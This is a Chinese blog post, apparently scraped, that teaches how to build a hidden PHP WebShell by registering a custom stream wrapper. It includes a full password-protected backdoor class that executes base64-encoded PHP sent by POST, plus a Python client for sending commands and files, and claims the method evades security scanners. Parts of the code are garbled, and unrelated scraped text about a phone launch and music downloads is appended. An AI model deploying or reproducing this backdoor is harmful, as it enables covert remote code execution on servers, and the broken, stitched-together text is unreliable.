0×00 前言
在Web安全领域WebShell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成WebShell,隐蔽度高,目前安全查杀软件没法检测到相关的后门漏洞,不同于 eval 或则 asset 等方式运行后门,对于这两个函数禁用的情况下一样适用,目前除了禁用相关函数还暂时没有相关方式来避免漏洞。
0×01 后门原理
在PHP开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码:
include 'http://www.test.com/code.php'
我们通过这一串代码可以很容易的引用外部的PHP程序,但是前提是配置文件允许该行为被执行,先看看我的配置项
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ; http://php.net/allow-url-fopen allow_url_fopen =Off ; Whether to allow include/require to open URLs (like http:// or ftp://) as files. ; http://php.net/allow-url-include allow_url_include = Off
从配置文件可以看到,allow_url_include 被我关闭了,也就是包含远程代码是不可能执行的,但是我们这里利用了一个东西。http:// 流,我们知道,在PHP中很多东西都是可以通过流包装器来使用的,比如常见的 php:// 流,我们可以通过 php://input 来获取输入流来读取请求体的内容,那么根据这个思路,我们能不能通过流包装器来实现代码执行?答案是可行的 通过PHP函数 stream_wrapper_register 注册包装器,检测特定的URL包装功能,监控 include 流,在 include 流中动态生成PHP代码,我将通过如下代码执行一个 hello world 程序来证明这个过程
include 'hello://dxkite';
Hello Stream Wrapper 的实现
code = "position = 0;
return true;
}
public function stream_read($count)
{
$ret = substr($this->code, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
public function stream_tell()
{
return $this->position;
}
public function stream_eof()
{
return $this->position >= strlen($this->code);
}
public function stream_seek($offset, $whence)
{
switch ($whence) {
case SEEK_SET:
if ($offset < strlen($this->code) && $offset >= 0) {
$this->position = $offset;
return true;
} else {
return false;
}
break;
case SEEK_CUR:
if ($offset >= 0) {
$this->position += $offset;
return true;
} else {
return false;
}
break;
case SEEK_END:
if (strlen($this->code) + $offset >= 0) {
$this->position = strlen($this->code) + $offset;
return true;
} else {
return false;
}
break;
default:
return false;
}
}
public function stream_stat()
{
return stat(FILE);
}
}
stream_wrapper_register('hello', HelloStream::class);
include 'hello://dxkite';
通过如上的代码,经过执行后,可以输出一个 hello worldHelloWorld
0×02 后门示例
通过上述程序,我们实现了通过 include 指令直接执行 php ,并插入我们想要的效果,我们现在根据这个原理写一个Shell:
后门程序
@link //dxkite.cn
*/
class ShellStream
{
protected $position;
protected $code;
public function stream_open($path, $mode, $options, &$opened_path)
{
$url = parse_url($path);
$name = $url["host"];
$this->code = base64_decode($name);
$this->position = 0;
return true;
}
public function stream_read($count)
{
$ret = substr($this->code, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
public function stream_tell()
{
return $this->position;
}
public function stream_eof()
{
return $this->position >= strlen($this->code);
}
public function stream_seek($offset, $whence)
{
switch ($whence) {
case SEEK_SET:
if ($offset < strlen($this->code) && $offset >= 0) {
$this->position = $offset;
return true;
} else {
return false;
}
break;
case SEEK_CUR:
if ($offset >= 0) {
$this->position += $offset;
return true;
} else {
return false;
}
break;
case SEEK_END:
if (strlen($this->code) + $offset >= 0) {
$this->position = strlen($this->code) + $offset;
return true;
} else {
return false;
}
break;
default:
return false;
}
}
// include
public function stream_stat()
{
return stat(FILE);
}
// file exists
public function url_stat(string $path,int $stat)
{
return stat(FILE);
}
public static function shell(){
stream_wrapper_register('shell', ShellStream::class);
if (isset($_POST['password']) && $_POST['code']) {
if ($_POST['password']=='dxkite') {
$code = $_POST['code'];
include 'shell://'.$code;
} else {
include 'shell://PD9waHAgZWNobyAiaGVsbG8gaGFjayI7';
}
}
}
}
ShellStream::shell();
上述我实现了一个使用 $_POST 作为输入,接收密码和php代码的base64并执行代码的后门利用程序
import requests
import base64
import sys
def send_raw(url,password,cmd):
res=requests.post(url,{
'password':password,
'code': base64.b64encode(cmd.encode('utf-8'))
})
return res.text
def send_php_shell(url,password,cmd):
return send_raw(url,password,'')
if cmd == 'exit':
break
elif cmd.startswith('run'):
cmd,path = cmd.split(' ',1)
code = ''
with open(path) as f:
for line in f:
code = code + line + "\r\n"
response = send_raw(url,password,code);
print(response)
else:
response = send_php_shell(url,password,cmd);
print(response)
我们把我们的 shell.php 部署到服务器上,执行测试 shell.py :
php-shell.png
其中,test.php 的内容为:
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
P70系列延期,华为新旗舰将在下月发布
3月20日消息,近期博主@数码闲聊站 透露,原定三月份发布的华为新旗舰P70系列延期发布,预计4月份上市。
而博主@定焦数码 爆料,华为的P70系列在定位上已经超过了Mate60,成为了重要的旗舰系列之一。它肩负着重返影像领域顶尖的使命。那么这次P70会带来哪些令人惊艳的创新呢?
根据目前爆料的消息来看,华为P70系列将推出三个版本,其中P70和P70 Pro采用了三角形的摄像头模组设计,而P70 Art则采用了与上一代P60 Art相似的不规则形状设计。这样的外观是否好看见仁见智,但辨识度绝对拉满。
更新日志
- 小骆驼-《草原狼2(蓝光CD)》[原抓WAV+CUE]
- 群星《欢迎来到我身边 电影原声专辑》[320K/MP3][105.02MB]
- 群星《欢迎来到我身边 电影原声专辑》[FLAC/分轨][480.9MB]
- 雷婷《梦里蓝天HQⅡ》 2023头版限量编号低速原抓[WAV+CUE][463M]
- 群星《2024好听新歌42》AI调整音效【WAV分轨】
- 王思雨-《思念陪着鸿雁飞》WAV
- 王思雨《喜马拉雅HQ》头版限量编号[WAV+CUE]
- 李健《无时无刻》[WAV+CUE][590M]
- 陈奕迅《酝酿》[WAV分轨][502M]
- 卓依婷《化蝶》2CD[WAV+CUE][1.1G]
- 群星《吉他王(黑胶CD)》[WAV+CUE]
- 齐秦《穿乐(穿越)》[WAV+CUE]
- 发烧珍品《数位CD音响测试-动向效果(九)》【WAV+CUE】
- 邝美云《邝美云精装歌集》[DSF][1.6G]
- 吕方《爱一回伤一回》[WAV+CUE][454M]



